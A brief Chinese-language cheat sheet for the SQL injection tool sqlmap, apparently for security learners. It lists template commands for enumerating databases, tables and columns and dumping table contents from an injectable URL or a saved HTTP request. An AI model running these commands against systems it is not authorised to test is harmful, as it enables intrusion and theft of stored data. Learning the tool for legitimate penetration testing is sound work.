簡單介紹下Sqlmap:它是一個自動化的SQL注入工具,其主要功能是掃描,發現並利用給定的URL的SQL注入漏洞。Sqlmap採用四種獨特的SQL注入技術,分別是盲推理SQL注入,UNION查詢SQL注入,堆查詢和基於時間的SQL盲注入。其廣泛的功能和選項包括數據庫指紋,枚舉,數據庫提取,訪問目標文件系統,並在獲取完全操作權限時實行任意命令。
下面是一些Sqlmap常用選項:
sqlmap -u "注入地址" --dbs // 列舉數據庫
sqlmap -u "注入地址" --tables -D "數據庫" // 列舉數據庫的表名
sqlmap -u "注入地址" --columns -T "表名" -D "數據庫" // 獲取表的列名
sqlmap -u "注入地址" --dump -C "字段,字段" -T "表名" -D "數據庫" // 獲取表中的所有數據
sqlmap -r "含http頭的文件" --dbs // 列舉數據庫
sqlmap -r "含http頭的文件" --tables -D "數據庫" // 列舉數據庫的表名
sqlmap -r "含http頭的文件" --columns -T "表名" -D "數據庫" // 獲取表的列名
sqlmap -r "含http頭的文件" --dump -C "字段,字段" -T "表名" -D "數據庫" // 獲取表中的所有數據
參考blog:https://blog.csdn.net/silence1_/article/details/89707760